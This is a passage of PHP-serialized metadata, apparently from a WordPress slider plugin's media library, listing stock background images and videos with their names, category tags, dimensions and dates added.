File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:306;a:12:{s:2:\"id\";s:2:\"91\";s:6:\"handle\";s:17:\"mountain_view.jpg\";s:4:\"name\";s:13:\"Mountain View\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1160\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:307;a:12:{s:2:\"id\";s:2:\"90\";s:6:\"handle\";s:19:\"rocky_landscape.jpg\";s:4:\"name\";s:15:\"Rocky Landscape\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:308;a:12:{s:2:\"id\";s:2:\"89\";s:6:\"handle\";s:19:\"mountain_view_4.jpg\";s:4:\"name\";s:15:\"Mountain View 4\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1203\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:309;a:13:{s:2:\"id\";s:3:\"529\";s:6:\"handle\";s:13:\"Fitness-4.jpg\";s:5:\"video\";s:13:\"Fitness-4.mp4\";s:4:\"name\";s:10:\"Fitness 4 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:310;a:13:{s:2:\"id\";s:3:\"528\";s:6:\"handle\";s:13:\"Fitness-3.jpg\";s:5:\"video\";s:13:\"Fitness-3.mp4\";s:4:\"name\";s:10:\"Fitness 3 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:311;a:13:{s:2:\"id\";s:3:\"527\";s:6:\"handle\";s:9:\"Chess.jpg\";s:5:\"video\";s:9:\"Chess.mp4\";s:4:\"name\";s:6:\"Chess \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:312;a:13:{s:2:\"id\";s:3:\"526\";s:6:\"handle\";s:13:\"Fitness-2.jpg\";s:5:\"video\";s:13:\"Fitness-2.mp4\";s:4:\"name\";s:10:\"Fitness 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:313;a:13:{s:2:\"id\";s:3:\"525\";s:6:\"handle\";s:11:\"Fitness.jpg\";s:5:\"video\";s:11:\"Fitness.mp4\";s:4:\"name\";s:8:\"Fitness \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"27\";s:6:\"handle\";s:5:\"sport\";s:4:\"name\";s:5:\"Sport\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:46:50\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:314;a:13:{s:2:\"id\";s:3:\"524\";s:6:\"handle\";s:9:\"Earth.jpg\";s:5:\"video\";s:9:\"Earth.mp4\";s:4:\"name\";s:6:\"Earth \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:315;a:13:{s:2:\"id\";s:3:\"523\";s:6:\"handle\";s:11:\"Space-2.jpg\";s:5:\"video\";s:11:\"Space-2.mp4\";s:4:\"name\";s:8:\"Space 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1440\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:316;a:13:{s:2:\"id\";s:3:\"522\";s:6:\"handle\";s:13:\"Asteroids.jpg\";s:5:\"video\";s:13:\"Asteroids.mp4\";s:4:\"name\";s:10:\"Asteroids \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:317;a:13:{s:2:\"id\";s:3:\"521\";s:6:\"handle\";s:9:\"Space.jpg\";s:5:\"video\";s:9:\"Space.mp4\";s:4:\"name\";s:6:\"Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"29\";s:6:\"handle\";s:5:\"space\";s:4:\"name\";s:5:\"Space\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:44:06\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:318;a:13:{s:2:\"id\";s:3:\"520\";s:6:\"handle\";s:10:\"People.jpg\";s:5:\"video\";s:10:\"People.mp4\";s:4:\"name\";s:7:\"People \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:319;a:13:{s:2:\"id\";s:3:\"519\";s:6:\"handle\";s:11:\"Walking.jpg\";s:5:\"video\";s:11:\"Walking.mp4\";s:4:\"name\";s:8:\"Walking \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:320;a:13:{s:2:\"id\";s:3:\"518\";s:6:\"handle\";s:19:\"Double-Exposure.jpg\";s:5:\"video\";s:19:\"Double-Exposure.mp4\";s:4:\"name\";s:16:\"Double Exposure \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:321;a:13:{s:2:\"id\";s:3:\"517\";s:6:\"handle\";s:8:\"Girl.jpg\";s:5:\"video\";s:8:\"Girl.mp4\";s:4:\"name\";s:5:\"Girl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1088\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:322;a:13:{s:2:\"id\";s:3:\"516\";s:6:\"handle\";s:17:\"Bengal-Lights.jpg\";s:5:\"video\";s:17:\"Bengal-Lights.mp4\";s:4:\"name\";s:14:\"Bengal Lights \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"24\";s:6:\"handle\";s:6:\"People\";s:4:\"name\";s:6:\"People\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:42:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:323;a:13:{s:2:\"id\";s:3:\"515\";s:6:\"handle\";s:13:\"Swiping-2.jpg\";s:5:\"video\";s:13:\"Swiping-2.mp4\";s:4:\"name\";s:10:\"Swiping 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:324;a:13:{s:2:\"id\";s:3:\"514\";s:6:\"handle\";s:11:\"Mock-Up.jpg\";s:5:\"video\";s:11:\"Mock-Up.mp4\";s:4:\"name\";s:8:\"Mock Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:325;a:13:{s:2:\"id\";s:3:\"513\";s:6:\"handle\";s:13:\"Countdown.jpg\";s:5:\"video\";s:13:\"Countdown.mp4\";s:4:\"name\";s:10:\"Countdown \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:326;a:13:{s:2:\"id\";s:3:\"512\";s:6:\"handle\";s:18:\"Wall-Sketching.jpg\";s:5:\"video\";s:18:\"Wall-Sketching.mp4\";s:4:\"name\";s:15:\"Wall Sketching \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:327;a:13:{s:2:\"id\";s:3:\"511\";s:6:\"handle\";s:26:\"Typing-on-the-keyboard.jpg\";s:5:\"video\";s:26:\"Typing-on-the-keyboard.mp4\";s:4:\"name\";s:23:\"Typing on the keyboard \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:328;a:13:{s:2:\"id\";s:3:\"510\";s:6:\"handle\";s:11:\"Meeting.jpg\";s:5:\"video\";s:11:\"Meeting.mp4\";s:4:\"name\";s:8:\"Meeting \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:329;a:13:{s:2:\"id\";s:3:\"509\";s:6:\"handle\";s:11:\"Swiping.jpg\";s:5:\"video\";s:11:\"Swiping.mp4\";s:4:\"name\";s:8:\"Swiping \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:330;a:13:{s:2:\"id\";s:3:\"508\";s:6:\"handle\";s:9:\"Alarm.jpg\";s:5:\"video\";s:9:\"Alarm.mp4\";s:4:\"name\";s:6:\"Alarm \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1013\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:331;a:13:{s:2:\"id\";s:3:\"507\";s:6:\"handle\";s:13:\"Hey-World.jpg\";s:5:\"video\";s:13:\"Hey-World.mp4\";s:4:\"name\";s:10:\"Hey World \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:332;a:13:{s:2:\"id\";s:3:\"506\";s:6:\"handle\";s:28:\"Typing-on-the-keyboard-2.jpg\";s:5:\"video\";s:28:\"Typing-on-the-keyboard-2.mp4\";s:4:\"name\";s:25:\"Typing on the keyboard 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:39:19\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:333;a:13:{s:2:\"id\";s:3:\"505\";s:6:\"handle\";s:10:\"Valley.jpg\";s:5:\"video\";s:10:\"Valley.mp4\";s:4:\"name\";s:7:\"Valley \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:334;a:13:{s:2:\"id\";s:3:\"504\";s:6:\"handle\";s:9:\"Stars.jpg\";s:5:\"video\";s:9:\"Stars.mp4\";s:4:\"name\";s:6:\"Stars \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:335;a:13:{s:2:\"id\";s:3:\"503\";s:6:\"handle\";s:21:\"Car-in-the-forest.jpg\";s:5:\"video\";s:21:\"Car-in-the-forest.mp4\";s:4:\"name\";s:18:\"Car in the forest \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1012\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:336;a:13:{s:2:\"id\";s:3:\"502\";s:6:\"handle\";s:15:\"Aerial-Shot.jpg\";s:5:\"video\";s:15:\"Aerial-Shot.mp4\";s:4:\"name\";s:12:\"Aerial Shot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:35:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:337;a:13:{s:2:\"id\";s:3:\"501\";s:6:\"handle\";s:14:\"Disco-Ball.jpg\";s:5:\"video\";s:14:\"Disco-Ball.mp4\";s:4:\"name\";s:11:\"Disco Ball \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:338;a:13:{s:2:\"id\";s:3:\"500\";s:6:\"handle\";s:22:\"Man-Playing-Guitar.jpg\";s:5:\"video\";s:22:\"Man-Playing-Guitar.mp4\";s:4:\"name\";s:19:\"Man Playing Guitar \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:339;a:13:{s:2:\"id\";s:3:\"499\";s:6:\"handle\";s:14:\"Live-Music.jpg\";s:5:\"video\";s:14:\"Live-Music.mp4\";s:4:\"name\";s:11:\"Live Music \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:340;a:13:{s:2:\"id\";s:3:\"498\";s:6:\"handle\";s:12:\"Cheer-Up.jpg\";s:5:\"video\";s:12:\"Cheer-Up.mp4\";s:4:\"name\";s:9:\"Cheer Up \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:341;a:13:{s:2:\"id\";s:3:\"497\";s:6:\"handle\";s:14:\"Night-club.jpg\";s:5:\"video\";s:14:\"Night-club.mp4\";s:4:\"name\";s:11:\"Night club \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:33:16\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:342;a:13:{s:2:\"id\";s:3:\"496\";s:6:\"handle\";s:17:\"Cup-Of-Coffee.jpg\";s:5:\"video\";s:17:\"Cup-Of-Coffee.mp4\";s:4:\"name\";s:14:\"Cup Of Coffee \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:343;a:13:{s:2:\"id\";s:3:\"495\";s:6:\"handle\";s:7:\"Pot.jpg\";s:5:\"video\";s:7:\"Pot.mp4\";s:4:\"name\";s:4:\"Pot \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:344;a:13:{s:2:\"id\";s:3:\"494\";s:6:\"handle\";s:11:\"Grill-2.jpg\";s:5:\"video\";s:11:\"Grill-2.mp4\";s:4:\"name\";s:8:\"Grill 2 \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:345;a:13:{s:2:\"id\";s:3:\"493\";s:6:\"handle\";s:13:\"Rice-Bowl.jpg\";s:5:\"video\";s:13:\"Rice-Bowl.mp4\";s:4:\"name\";s:10:\"Rice Bowl \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1010\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:346;a:13:{s:2:\"id\";s:3:\"492\";s:6:\"handle\";s:9:\"Grill.jpg\";s:5:\"video\";s:9:\"Grill.mp4\";s:4:\"name\";s:6:\"Grill \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:30:48\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:347;a:13:{s:2:\"id\";s:3:\"491\";s:6:\"handle\";s:9:\"Water.jpg\";s:5:\"video\";s:9:\"Water.mp4\";s:4:\"name\";s:6:\"Water 